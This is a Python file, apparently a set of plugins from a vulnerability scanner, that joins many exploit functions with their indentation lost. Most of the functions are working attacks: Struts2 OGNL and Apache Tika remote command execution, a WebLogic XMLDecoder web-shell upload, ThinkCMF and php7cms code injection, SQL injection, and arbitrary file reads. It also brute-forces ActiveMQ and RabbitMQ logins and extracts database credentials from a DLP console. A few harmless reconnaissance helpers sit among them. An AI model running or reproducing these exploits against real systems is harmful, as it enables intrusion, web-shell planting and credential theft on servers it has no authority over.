def prove(data):
'''
比较耗时,建议单独跑脚本
'''
data = init(data, 'dedecms')
if data['base_url']:
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
_data = {
"_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
"_FILES[mochazz][name]": 0,
"_FILES[mochazz][size]": 0,
"_FILES[mochazz][type]": "image/gif"
}
for a in ['', 'dedecms/']:
url = data['base_url'] + a + 'tags.php'
back_dir = ""
flag = 0
res = curl('get', url)
if res!=None and res.status_code ==200:
for num in range(1, 7):
if flag ==1 :
break
for pre in itertools.permutations(characters, num):
pre = ''.join(list(pre))
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=pre)
r = curl('post', url, data=_data)
if r!=None:
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
flag = 1
back_dir = pre
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
flag = 0
x = 0
for i in range(30):
if flag == 1:
x = i
break
for ch in characters:
if ch == characters[-1]:
flag = 1
x = i
break
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
r = curl('post', url, data=_data)
if r != None:
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
back_dir += ch
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
if x < 29 and flag ==1:
data['flag'] = 1
data['data'].append({"url": data['base_url'] + a + back_dir})
data['res'].append({"info": data['base_url'] + a + back_dir, "key": 'dede_manage'})
return data
def prove(data):
data = init(data, 'phpcms')
if data['base_url']:
headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4"}
for path in ["", "phpcms/"]:
url1 = data['base_url'] + path +"index.php?m=wap&c=index&a=init&siteid=1"
res1 = curl('get',url1,headers = headers)
if res1 !=None:
for cookie in res1.cookies:
if '_siteid' in cookie.name:
userid = cookie.value
url2 = data['base_url'] + path +"index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad%3Dx%26i%3D1%26modelid%3D1%26catid%3D1%26d%3D1%26m%3D1%26s%3Dindex%26f%3D.p%25253chp"
_data1 = {'userid_flash': userid}
res2 = curl('post', url=url2, data=_data1,headers = headers)
if res2 != None:
for cookie in res2.cookies:
if '_att_json' in cookie.name:
att_json = cookie.value
url3 = data['base_url'] + path +"index.php?m=content&c=down&a=init&a_k=" + att_json
res3 = curl('get', url3,headers = headers)
if res3 !=None:
file = re.findall(r'<a href="(.+?)"', res3.text)[0]
url4 = data['base_url'] + path + 'index.php' + file
res4 = curl('get', url4,headers = headers)
if res4 !=None:
if '<?php' in res4.text:
data['flag'] = 1
data['data'].append({"url": url4})
data['res'].append({"info": url1, "key": "phpcms v9 download",'connect':res4.text})
return data
return data
def prove(data):
data = init(data, 'weblogic')
if data['base_url']:
headers = {"Content-Type": "text/xml"}
url = data['base_url'] + 'wls-wsat/CoordinatorPortType'
ran = str(random.randint(100000, 999999))
poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
try:
result = curl('post', url, data=poc, headers=headers)
targeturl = data['base_url'] + "/bea_wls_internal/" + ran + ".txt"
result = curl('get', targeturl)
if result and str(
result.status_code
) == '200' and 'xmldecoder_vul_test' in result.text:
data['flag'] = 1
data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
data['res'].append({"info": url, "key": targeturl})
else:
ran = str(random.randint(100000, 999999))
poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
result = curl('post', url, data=poc, headers=headers)
targeturl = data['base_url'] + "/wls-wsat/" + ran + ".txt"
result = curl('get', url)
if result and str(
result.status_code
) == '200' and 'xmldecoder_vul_test' in result.text:
data['flag'] = 1
data['data'].append(
{"page": '/wls-wsat/CoordinatorPortType'})
data['res'].append({"info": targeturl, "key": url})
except Exception as e:
pass
return data
def upload(data=None):
data = init(data, 'weblogic')
if data['base_url']:
headers = {"Content-Type": "text/xml"}
url = data['base_url'] + 'wls-wsat/CoordinatorPortType'
result = curl('post', url, data=shellpoc1, headers=headers)
targeturl = data['base_url'] + "/bea_wls_internal/ahtest.jsp"
result = curl('get', targeturl)
if str(result.status_code) == '200' and 'ahtest' in result.text:
data['flag'] = 1
data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
data['res'].append({
"info": url,
"key": targeturl + "?pwd=ahtest&cmd=whoami"
})
else:
result = curl('post', url, data=shellpoc2, headers=headers)
targeturl = data['base_url'] + "/wls-wsat/ahtest.jsp"
result = curl('get', targeturl)
if str(result.status_code) == '200' and 'ahtest' in result.text:
data['flag'] = 1
data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
data['res'].append({
"info": targeturl + "?pwd=ahtest&cmd=whoami",
"key": "/wls-wsat/CoordinatorPortType"
})
return data
def prove(data):
init(data,'thinkcmf')
if data['base_url']:
url = data[
'base_url'] + "index.php?g=Comment&m=Widget&a=fetch"
_data = "templateFile=/../public/index&prefix=''&content=<php>file_put_contents('bytestforme1.php','<?php phpinfo();')</php>"
res = curl('post', url,data = _data)
if res != None and res.status_code == 200:
res = curl('get', data['base_url'] + "/bytestforme1.php")
if res != None and res.status_code == 200 and 'php.ini' in res.text:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({"info": url, "key": "thinkcmf 2.2.3 template inject"})
return data
def upload(data):
data = init(data, 'struts')
if data['url'] != None:
despath = data['despath']
content = _read_file(data['srcpath'])
prove_poc = "redirect%3a%24%7b%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27)%2c%23res%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)%2c%23res.getWriter().print(%22oko%22)%2c%23res.getWriter().print(%22kok%2f%22)%2c%23res.getWriter().print(%23req.getContextPath())%2c%23res.getWriter().flush()%2c%23res.getWriter().close()%2cnew+java.io.BufferedWriter(new+java.io.FileWriter(%22%PATH%%22)).append(%23req.getParameter(%22shell%22)).close()%7d&shell=%FILECONTENT%".replace("%PATH%", despath).replace("%FILECONTENT%", content)
try:
headers = {"Content-Type": "application/x-www-form-urlencoded"}
curl('get', data['url'], data=prove_poc, headers=headers)
data['flag'] = 1
data['data'].append({"poc": prove_poc})
data['res'].append({"info": data['despath'],"key":"upload"})
except:
pass
return data
def prove(data):
data = init(data, 'web')
if data['url']:
try:
waf = None
res = curl('get', data['url'])
header = res.headers
html = res.text
mark_list = []
marks = _dna.strip().splitlines()
for mark in marks:
name, location, key, value = mark.strip().split("|", 3)
mark_list.append([name, location, key, value])
for mark_info in mark_list:
name, location, key, reg = mark_info
if location == "headers":
if re.search(reg, header, re.I) and key in header:
waf = name
break
if location == "index":
if re.search(reg, html, re.I):
waf = name
break
m = re.search('<title>(.*)?<\/title>', html)
if m:
print(m.group(1), 'title')
if waf != None:
data['flag'] = 1
data['res'].append({"info": waf, "key": "waf"})
except:
pass
return data
def prove(data):
data = init(data, 'confluence')
if data['base_url']:
filename = "../web.xml"
limitSize = 100
payload = data['base_url'] + "rest/tinymce/1/macro/preview"
headers = {
"User-Agent":
"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Referer": data['base_url'] +
"pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
"Content-Type": "application/json; charset=utf-8"
}
_data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
try:
r = curl('post', payload, data=_data, headers=headers)
if r.status_code == 200 and "</web-app>" in r.text:
m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
if m:
content = m.group()[:limitSize]
data['flag'] = 1
data['data'].append({"content": content})
data['res'].append({"info": payload, "key": filename})
except:
pass
return data
def exec(data):
init(data, 'apache')
if data['base_url']:
headers = {
"X-Tika-OCRTesseractPath": "\"cscript\"",
"X-Tika-OCRLanguage": "//E:Jscript",
"Expect": "100-continue",
"Content-type": "image/jp2",
"Connection": "close"
}
url = data['base_url'] + "meta"
jscript = '''var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c {}');
'''.format(data['cmd'])
try:
res = curl('put', url, headers=headers, data=jscript)
if res != None and "X-Parsed-By" in res.text and "tika.parse" in res.text:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({
"info": res.text,
"key": "Apache Tika-server RCE"
})
except:
pass
return data
def exec(data=None):
data = init(data, 'struts')
if data['url'] != None:
cmd = data['cmd']
exec_poc = '''%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='%COMMAND%').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b'''
headers = {}
try:
files = {
"test": (exec_poc.replace("%COMMAND%", cmd), "text/plain")
}
r = curl('post',
data['url'],
headers=headers,
files=files,
stream=True).text
res = ""
try:
for line in r.iter_lines():
res += str(line) + '\r\n'
except:
res = str(res)
data['flag'] = 1
data['data'].append({"poc": exec_poc})
data['res'].append({"info": res, "key": cmd})
except:
pass
return data
def _ICPbybeianbeian(domain, dic):
flag = False
for j in range(3):
flag = False
try:
url = "http://www.beianbeian.com/search/" + domain.strip(' ')
result = curl('get', url)
soup = BeautifulSoup(result.text, "html5lib")
info1 = info2 = None
alist = soup.find_all('a', href=re.compile('/beianxinxi/'))
if len(alist) > 0:
info1 = alist[0].get_text()
div = soup.find(id="pass_time")
info2 = div.get_text()
ICPinfo = domain
if info1 != None and info2 != None:
ICPinfo += ":" + info1 + ":" + info2
if ICPinfo != domain and ICPinfo not in dic['ICP']:
dic['ICP'].append(ICPinfo)
flag = True
dic['flag'] = True
dic['beianbeian_icp'] = True
return dic, flag
except:
pass
logger.debug("Error for ICP(%s)%s by beianbeian" % (dic['id'], domain))
return dic, flag
def upload(data=None):
data = init(data, 'struts')
if data['url'] != None:
upload_poc = '''debug=command&expression=#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.getWriter().print("oko"),#res.getWriter().print("kok/"),#res.getWriter().print(#req.getContextPath()),#res.getWriter().flush(),#res.getWriter().close(),new java.io.BufferedWriter(new java.io.FileWriter(%PATH%)).append(#req.getParameter("shell")).close()&shell=%FILECONTENT%'''
despath = data['despath']
content = _read_file(data['srcpath'])
headers = {}
try:
headers["Content-Type"] = "application/x-www-form-urlencoded"
curl('get', data['url'],params=upload_poc.replace("%PATH%", despath).replace("%FILECONTENT%", content),headers=headers)
data['flag'] = 1
data['data'].append({"poc": upload_poc})
data['res'].append({"info": data['despath'],"key":"upload"})
except:
pass
return data
def prove(data):
data = init(data, 'activemq')
if data['base_url']:
usernamedic = _read_dic(data['d1']) if 'd1' in data.keys(
) else _read_dic('dict/activemq_usernames.txt')
passworddic = _read_dic(data['d2']) if 'd2' in data.keys(
) else _read_dic('dict/activemq_passwords.txt')
url = data['base_url'] + "admin/"
for linef1 in usernamedic:
username = linef1.strip('\r').strip('\n')
for linef2 in passworddic:
try:
password = (linef2 if '%user%' not in linef2
else str(linef2).replace(
"%user%",
str(username))).strip('\r').strip('\n')
key = b64encode(":".join([username, password]))
data['headers']["Authorization"] = 'Basic %s' % key
res = curl('get', url)
if 'Console' in res.text:
data['flag'] = 1
data['data'].append({
"username": username,
"password": password
})
data['res'].append({
"info": username + "/" + password,
"key": "Authorization: " + key
})
except Exception:
pass
return data
def _ICPsobeian(domain, dic):
flag = False
for j in range(3):
flag = False
try:
ICPinfo = domain
ICPTime = "None"
url = "http://www.sobeian.com/search?key=" + domain.strip(
' ') + "/"
result = curl('get', url)
soup = BeautifulSoup(result.text, "html5lib")
for span in soup.find_all("span",
class_="list-group-item clearfix"):
alist = span.find_all('a', href=re.compile('/icp/details/'))
if domain in alist[2].get_text().split(' '):
ICPinfo += ":" + alist[1].get_text()
temp = re.search(r'\d{4}\-\d{2}\-\d{2}', span.get_text())
if temp != None:
ICPTime = temp.group()
ICPinfo += ":" + ICPTime
dic['ICP'].append(ICPinfo)
flag = True
break
dic['flag'] = True
dic['sobeian_icp'] = True
return dic, flag
except:
pass
logger.debug("Error for ICP(%s)%s by sobeian" % (dic['id'], domain))
return dic, flag
def _ICPbyaizhan(domain, dic):
flag = False
for j in range(3):
flag = False
try:
url = "https://icp.aizhan.com/" + domain.strip(' ') + "/"
result = curl('get', url)
soup = BeautifulSoup(result.text, "html5lib")
div = soup.find(id="icp-table")
ICPinfo = domain
if div != None:
for span in div.find_all('span'):
info = span.get_text()
if info != None:
ICPinfo += ":" + info
if ICPinfo != domain and ICPinfo not in dic['ICP']:
dic['ICP'].append(ICPinfo)
flag = True
dic['flag'] = True
dic['aizhan_icp'] = True
return dic, flag
except:
pass
logger.debug("Error for ICP(%s)%s by aizhan" % (dic['id'], domain))
return dic, flag
def prove(data):
try:
hostname = socket.gethostbyname(data['target_host'])
except:
return data
info = hostname
data['flag'] = 1
url = "http://ip.taobao.com/service/getIpInfo.php?ip=%s" % hostname
while True:
try:
res = curl('get', url)
if res.status_code == 200:
jsondata = json.loads(res.text)
if jsondata['code'] == 1:
jsondata['data'] = {'region': '', 'city': '', 'isp': ''}
else:
if jsondata['data']['region']:
info += " | Region: " + jsondata['data']['region']
if jsondata['data']['isp']:
info += " | ISP: " + jsondata['data']['isp']
if jsondata['data']['city']:
info += " | City: " + jsondata['data']['city']
break
elif res.status_code == 502:
time.sleep(0.3)
else:
break
except :
pass
data['res'].append({"info": info, "key": 'IP Information'})
return data
def _by114best(target, dic):
for j in range(3):
try:
headers = {}
url = "http://www.114best.com/ip/114.aspx?w=" + target.strip(' ')
headers['X-Forwarded-For'] = '.'.join([
str(random.randint(0, 255)),
str(random.randint(0, 255)),
str(random.randint(0, 255)),
str(random.randint(0, 255))
])
result = curl('get', url)
soup = BeautifulSoup(result.text, "html5lib")
div = soup.find(id="rl")
for span in div.find_all('span'):
mydomain = span.get_text().replace(" ", "").replace(
"\r", "").replace("\n", "")
if mydomain not in dic['domain']:
dic['domain'].append(mydomain)
dic['114best_domain'] = True
dic['flag'] = True
return dic
except:
pass
logger.debug("Error for (%s)%s by 114best" % (dic['id'], target))
return dic
def prove(data):
data = init(data, 'web')
if data['base_url'] != None:
try:
res = curl('options',data['base_url']+"/testbyme")
allow = res.headers['Allow']
if 'PUT' in allow:
for _url in [str(int(time.time())) + '.jsp/',str(int(time.time())) + '.jsp::$DATA',str(int(time.time())) + '.jsp%20']:
url = data['base_url'] + _url
res = curl('put', url)
if res.status == 201 or res.status == 204:
data['flag'] = 1
data['data'].append({"method": "put"})
data['res'].append({"info": url,"key":"PUT"})
except:
pass
return data
def upload(data):
data = init(data, 'struts')
if data['url'] != None:
despath = data['despath']
content = _read_file(data['srcpath'])
headers = {}
headers[
"Content-Type"] = """%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#fs=new java.io.FileOutputStream("%PATH%")).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/')).(#out.print(#req.getContextPath())).(#out.close())}""".replace(
"%PATH%", despath).replace("%FILECONTENT%", content)
try:
curl('get', data['url'], headers=headers)
data['flag'] = 1
data['data'].append({"headers": headers})
data['res'].append({"info": data['despath'], "key": 'upload'})
except:
pass
return data
def _gethtml(url):
try:
u = curl('get',url)
content = u.text
return {"html":content,"code":u.status_code,"url":url}
except Exception as e:
# print(e)
# _status_flag = _status_flag - 1
return {"html":"", "code":0, "url": url}
def prove(data):
data = init(data, 'rabbitmq')
if data['base_url']:
usernamedic = _read_dic(data['d1']) if 'd1' in data.keys(
) else _read_dic('dict/rabbitmq_usernames.txt')
passworddic = _read_dic(data['d2']) if 'd2' in data.keys(
) else _read_dic('dict/rabbitmq_passwords.txt')
url = data['base_url'] + 'api/whoami'
res = curl('get', url)
if res == 401:
for linef1 in usernamedic:
username = linef1.strip('\r').strip('\n')
for linef2 in passworddic:
try:
password = (linef2 if '%user%' not in linef2 else
str(linef2).replace(
"%user%",
str(username))).strip('\r').strip('\n')
key = str(
b64encode(
bytes(":".join([username, password]),
'utf-8')), 'utf-8')
headers = {"Authorization": 'Basic %s' % key}
res = curl('get', url, headers=headers)
if res != 401 and 'Console' in res.text:
data['flag'] = 1
data['data'].append({
"username": username,
"password": password
})
data['res'].append({
"info":
username + "/" + password,
"key":
"Authorization: " +
":".join([username, password])
})
return data
except Exception:
pass
return data
def prove(data):
xmldata = '''
<?xml version="1.0" encoding="UTF-8"?>
<root>
dGVzdCBieSBtZQ==
</root>
'''
data = init(data,'ucms')
if data['base_url']:
for url in [data['base_url'], data['url']]:
myurl = url + '/ucms/cms/client/uploadpic_html.jsp?toname=justfortest.jsp&diskno=xxxx'
res = curl('post',myurl,data = xmldata)
if res != None and res.status_code is 200:
myurl = url + '/ucms/cms-data/temp_dir/xxxx/temp.files/justfortest.jsp'
testres = curl('post',myurl,data = xmldata)
if testres != None and 'test by me' in testres.text:
data['flag'] = 1
data['data'].append({"page": myurl})
data['res'].append({"info": myurl, "key": "ucms upload"})
return data
def upload(data=None):
data = init(data, 'struts')
if data['url'] != None:
upload_poc = '''%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('start:')).(#fs=new java.io.FileOutputStream(%PATH%)).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/:end')).(#out.print(#req.getContextPath())).(#out.close())}'''
despath = data['despath']
content = _read_file(data['srcpath'])
try:
_data = 'name=' + upload_poc.replace("%PATH%", despath).replace(
"%FILECONTENT%",
content) + '&age=a&__checkbox_bustedBefore=true&description=s'
curl('post',
data['base_url'] +
'/struts2-showcase/integration/saveGangster.action',
data=_data)
data['flag'] = 1
data['data'].append({"poc": upload_poc})
data['res'].append({"info": despath, "key": 'upload'})
except:
pass
return data
def prove(data):
data = init(data, 'php7cms')
if data['base_url']:
for path in ["", "php7cms/"]:
postData = {'data': '<?php phpinfo()?>'}
url1 = data[
'base_url'] + path + 'index.php?s=api&c=api&m=save_form_data&name=/../../../adminsss.php"'
res = curl('post', url1, data=postData)
if res != None:
url2 = data['base_url'] + path + 'adminsss.php'
res = curl('get', url2)
if res != None and "php.ini" in res.text:
data['flag'] = 1
data['data'].append({"url": url2})
data['res'].append({
"info": url1,
"key": "php7cms getshell"
})
break
return data
def prove(data):
data = init(data,'web')
if data['url']:
result = curl('get', data['url'])
if result != None:
status = result.status_code
# Text
webkeydic = _read_dic(data['dic_one']) if 'dic_one' in data.keys() else _read_dic('dict/web_content_key.txt')
content = result.text
key = ''
for searchkey in webkeydic:
searchkey = str(searchkey, 'utf-8').replace("\r", "").replace("\n", "")
try:
if searchkey in content:
key += searchkey + ','
data['flag'] = 1
except Exception as e:
print(e)
pass
# title
soup = BeautifulSoup(result.text, "html5lib")
if soup != None:
codes = ['utf-8', 'gbk']
title = soup.title
if title == None or title.string == '':
title = "[None Title]".encode('utf-8')
else:
if result.encoding != None:
try:
title = title.string.encode(result.encoding)
codes.append(result.encoding)
except:
title = "[Error Code]".encode('utf-8')
else:
title = title.string
codes.append(type)
for j in range(0, len(codes)):
try:
title = title.decode(codes[j]).strip().replace("\r", "").replace("\n", "")
break
except:
continue
finally:
if j + 1 == len(codes):
title = '[Error Code]'
else:
title = '[None Title]'
if data['flag'] == 1:
data['res'].append({"info": title, "key": key[:-1], "status": status})
return data
def prove(data):
data = init(data,'yst_dlp')
if data['base_url']:
sql_result = None
name = ''
try:
url = data['base_url'] + '/CDGServer3/help/getEditionInfo.jsp'
r = curl('get',url)
if r :
res = r.text
soup = BeautifulSoup(res,'html5lib')
if '授权用户' in res:
name = soup.select('body > div:nth-of-type(2) > table > tbody > tr:nth-of-type(6) > td:nth-of-type(2) > input[type="text"]')
else:
name = soup.select(
'body > div:nth-of-type(2) > table > tbody > tr:nth-of-type(5) > td:nth-of-type(2) > input[type="text"]')
if len(name) > 0:
name = name[0]['value']
except:
name = ''
try:
url = data['base_url'] + '/CDGServer3/SystemConfig'
_data = {'command':'Login','verifyCodeDigit':'dfd','name':'configadmin','pass':'******'}
r = curl('post',url,data = _data)
if r :
res = r.content
soup = BeautifulSoup(res, 'html5lib')
sql_user = soup.select('#est\\.connection\\.username')[0]['value']
sql_pass = soup.select('#est\\.connection\\.password')[0]['value']
sql_result = name+ '/' + sql_user + '/' + sql_pass
except:
sql_result = None
if sql_result:
if _socket_connect(data['target_host'],1433):
sql_result = data['target_host'] + ":1433/" + sql_result
data['flag'] = 1
data['data'].append({"page": url})
data['res'].append({"info": sql_result, "key": "configadmin/123456"})
return data
def prove(data):
init(data,'thinkcmf')
if data['base_url']:
url = data[
'base_url'] + "index.php?g=Portal&m=Article&a=edit_post"
_data = 'term=123&post[post_title]=123&post[post_title]=aaa&post_title=123&post[id][0]=bind&post[id][1]=0 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))'
res = curl('post', url,data = _data)
if res != None and ':XPATH' in res.text:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({"info": url, "key": "thinkcmf 2.2.3 sql"})
return data
def upload(data=None):
data = init(data, 'struts')
if data['url'] != None:
upload_poc = '''%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#filecontent='%FILECONTENT%').(new java.io.BufferedWriter(new java.io.FileWriter('%PATH%')).append(new java.net.URLDecoder().decode(#filecontent,'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}\0b'''
despath = data['despath']
content = _read_file(data['srcpath'])
headers = {}
try:
files = {
"test":
(upload_poc.replace("%PATH%",
despath).replace("%FILECONTENT%",
content), "text/plain")
}
curl('post', data['url'], headers=headers, files=files)
data['flag'] = 1
data['data'].append({"poc": upload_poc})
data['res'].append({"info": despath, "key": 'upload'})
except:
pass
return data
def upload(data=None):
data = init(data, 'struts')
if data['url'] != None:
upload_poc = '''method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&shellname=%PATH%&shellContent=%FILECONTENT%&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f'''
despath = data['despath']
content = _read_file(data['srcpath'])
headers = {}
try:
headers["Content-Type"] = "application/x-www-form-urlencoded"
curl('get',
data['url'],
params=upload_poc.replace("%PATH%", despath).replace(
"%FILECONTENT%", content),
headers=headers)
data['flag'] = 1
data['data'].append({"poc": upload_poc})
data['res'].append({"info": despath, "key": "upload"})
except:
pass
return data
def prove(data):
data = init(data, 'web')
if data['base_url'] != None:
try:
res = curl('options', data['base_url'] + "/testbyme")
allow = res.headers['Allow']
data['flag'] = 1
data['data'].append({"method": "options"})
data['res'].append({"info": allow, "key": "OPTIONS"})
except:
pass
return data
